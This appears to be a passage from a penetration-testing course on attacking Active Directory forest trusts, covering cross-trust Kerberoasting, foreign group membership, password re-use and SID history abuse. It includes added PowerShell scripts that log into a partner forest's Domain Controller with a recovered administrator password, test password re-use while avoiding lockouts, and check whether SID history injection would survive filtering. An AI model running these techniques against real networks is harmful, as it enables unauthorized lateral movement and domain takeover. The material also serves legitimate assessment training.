Note: Kerberos attacks such as Kerberoasting and AS-REP Roasting can be performed across trusts, depending on the trust direction. This works because Kerberos authentication is still enabled across the trust: a user in one forest can ask a Domain Controller in the trusted forest for service tickets (or trigger AS-REP responses) just as a local user could, provided the trust direction lets that forest authenticate our account.
We can use PowerView's Get-DomainUser with the -Domain parameter to enumerate accounts in the target domain that have SPNs associated with them, and then request service tickets for them across the trust.
Sometimes we'll run into situations where admin users in one domain are also admin users in another domain, so it is worth checking for password re-use between domains: the same person often keeps one password for the accounts they hold in each forest.
We may also find that accounts from one domain are members of groups in another domain. Only Domain Local groups can contain security principals from outside their own forest, so this is where such memberships show up. We can use the PowerView function Get-DomainForeignGroupMember to enumerate groups whose members do not belong to the queried domain, also known as foreign group membership.
Here for example we see that the built-in Administrators group in FREIGHTLOGISTICS.LOCAL has the built-in Administrator account for the INLANEFREIGHT.LOCAL domain as a member.
We can verify this access using the Enter-PSSession cmdlet to connect over WinRM.
With that, we successfully authenticate to the Domain Controller in the FREIGHTLOGISTICS.LOCAL domain using the Administrator account from the INLANEFREIGHT.LOCAL domain across the bidirectional forest trust. This can be a quick win after taking control of a domain and is always worth checking for when a bidirectional forest trust is present during an assessment and the second forest is in scope.
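The foreign group membership check, the WinRM verification, and the password re-use check from the paragraphs above, as one added example that is not code from the original page. It assumes PowerView is imported, uses ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL as a placeholder hostname for the FREIGHTLOGISTICS.LOCAL Domain Controller (the page does not name it), and assumes we already hold the INLANEFREIGHT\administrator password (the value shown is a placeholder).

```powershell
# Added example (not from the original page). Assumptions: PowerView is imported;
# the DC hostname and the password below are placeholders, not values from the page.

$TargetDomain  = 'FREIGHTLOGISTICS.LOCAL'
$TargetDC      = 'ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL'   # assumed hostname
$PlainPassword = 'Placeholder-Password-Here'                # recovered INLANEFREIGHT\administrator password

# 1. Foreign group membership in the trusted forest. MemberName is the raw SID of a
#    ForeignSecurityPrincipal, so resolve it to a name with Convert-SidToName.
$Foreign = Get-DomainForeignGroupMember -Domain $TargetDomain
$Foreign | ForEach-Object {
    [pscustomobject]@{
        Group     = "$($_.GroupDomain)\$($_.GroupName)"
        MemberSid = $_.MemberName
        Member    = Convert-SidToName $_.MemberName
    }
} | Format-Table -AutoSize

# 2. Verify the access non-interactively before opening a session. If the foreign
#    member really is INLANEFREIGHT\administrator in FREIGHTLOGISTICS' Administrators
#    group, WinRM on the DC accepts our current-forest credential.
$Cred = New-Object System.Management.Automation.PSCredential(
    'INLANEFREIGHT\administrator',
    (ConvertTo-SecureString $PlainPassword -AsPlainText -Force))

Invoke-Command -ComputerName $TargetDC -Credential $Cred -ScriptBlock {
    "Connected as $(whoami) on $(hostname)"
}
# Interactive shell, as in the text:
# Enter-PSSession -ComputerName $TargetDC -Credential $Cred

# 3. Password re-use: does the same password also work for the *native* administrator
#    account of the other forest? ValidateCredentials performs a real logon attempt
#    against FREIGHTLOGISTICS.LOCAL, so it shows up in their logs as any logon would.
Add-Type -AssemblyName System.DirectoryServices.AccountManagement
$ctx = New-Object -TypeName System.DirectoryServices.AccountManagement.PrincipalContext `
                  -ArgumentList 'Domain', $TargetDomain
$Reused = $ctx.ValidateCredentials('administrator', $PlainPassword)
"Password reused by $TargetDomain\administrator: $Reused"
```

Step 2 tests the access the foreign membership grants; step 3 is a different check, whether the second forest's own RID-500 account shares the password. Keep the number of ValidateCredentials attempts low per account so the check cannot trip lockout thresholds in the other forest.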
SID History Abuse
If the SID of an account with administrative privileges in Forest A is added to the SID history attribute of an account in Forest B, and that account can authenticate across the forest trust, then it will have administrative privileges when accessing resources in the partner forest. The caveat is SID filtering: forest trusts filter SIDs from the trusted forest by default, so this only works where SID history has been explicitly enabled on the trust (for example with netdom trust ... /enablesidhistory:yes), and even then well-known and built-in SIDs (RIDs below 1000) are still stripped, so the injected SID normally has to belong to a custom privileged group or account rather than Domain Admins or Enterprise Admins.
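A check for whether the trust configuration would let a SID history entry survive, and a hunt for accounts that already carry SID history, as an added example that is not code from the original page. It reads the trustedDomain objects of the forest whose resources would be accessed (the trusting side enforces the filtering), decodes the trustAttributes bits as defined in MS-ADTS, and assumes PowerView is imported for the final query; FREIGHTLOGISTICS.LOCAL is used as the partner forest from the text.

```powershell
# Added example (not from the original page). Assumptions: bit values are the
# MS-ADTS trustAttributes flags; the SidHistoryUsable verdict is this example's own
# interpretation of those flags; PowerView is imported for the last query.

$TrustAttributeFlags = [ordered]@{
    0x1   = 'NON_TRANSITIVE'
    0x2   = 'UPLEVEL_ONLY'
    0x4   = 'QUARANTINED_DOMAIN'                  # SID filtering on an external trust
    0x8   = 'FOREST_TRANSITIVE'
    0x10  = 'CROSS_ORGANIZATION'                  # selective authentication
    0x20  = 'WITHIN_FOREST'
    0x40  = 'TREAT_AS_EXTERNAL'                   # forest trust with SID history enabled
    0x80  = 'USES_RC4_ENCRYPTION'
    0x200 = 'CROSS_ORGANIZATION_NO_TGT_DELEGATION'
    0x400 = 'PIM_TRUST'
}

function Get-TrustSidFilteringState {
    # Query the trustedDomain objects of $Domain over LDAP and decode what they say
    # about SID filtering for inbound SIDs. Query the forest whose resources you want
    # to reach with the injected SID; its own trust object is what its DCs enforce.
    param([Parameter(Mandatory)][string]$Domain)

    $root     = New-Object System.DirectoryServices.DirectoryEntry("LDAP://$Domain")
    $searcher = New-Object System.DirectoryServices.DirectorySearcher($root)
    $searcher.Filter = '(objectClass=trustedDomain)'
    [void]$searcher.PropertiesToLoad.AddRange(@('name', 'trustAttributes', 'trustDirection'))

    foreach ($r in $searcher.FindAll()) {
        $attrs = [int]$r.Properties['trustattributes'][0]
        $dir   = [int]$r.Properties['trustdirection'][0]
        $flags = $TrustAttributeFlags.Keys | Where-Object { $attrs -band $_ } |
                 ForEach-Object { $TrustAttributeFlags[$_] }

        $isForest   = [bool]($attrs -band 0x8)
        $external   = [bool]($attrs -band 0x40)
        $quarantine = [bool]($attrs -band 0x4)

        # Forest trust: SIDs from the other forest are filtered unless TREAT_AS_EXTERNAL
        # is set, in which case only RIDs below 1000 are stripped.
        # External trust: SIDs are filtered when QUARANTINED_DOMAIN is set.
        $sidHistoryUsable = if ($isForest) { $external } else { -not $quarantine }

        [pscustomobject]@{
            Trust            = $r.Properties['name'][0]
            Direction        = @{ 1 = 'Inbound'; 2 = 'Outbound'; 3 = 'Bidirectional' }[$dir]
            Flags            = ($flags -join ',')
            SidHistoryUsable = $sidHistoryUsable
        }
    }
}

# What does FREIGHTLOGISTICS.LOCAL enforce on the SIDs we would present to it?
Get-TrustSidFilteringState -Domain 'FREIGHTLOGISTICS.LOCAL' | Format-Table -AutoSize

# Accounts that already carry SID history are worth reviewing in both forests: they show
# where migrations left extra privilege, and they are the first place to look for abuse.
Get-DomainUser -Domain 'FREIGHTLOGISTICS.LOCAL' -LDAPFilter '(sidHistory=*)' -Properties samaccountname, sidhistory |
    Format-Table -AutoSize
```

A trust that reports FOREST_TRANSITIVE without TREAT_AS_EXTERNAL will drop the injected SID at the boundary, and the attack in the text will not work regardless of what is written into sidHistory; in that case, the cross-forest paths covered earlier (foreign group membership, password re-use, roastable accounts) are the realistic options.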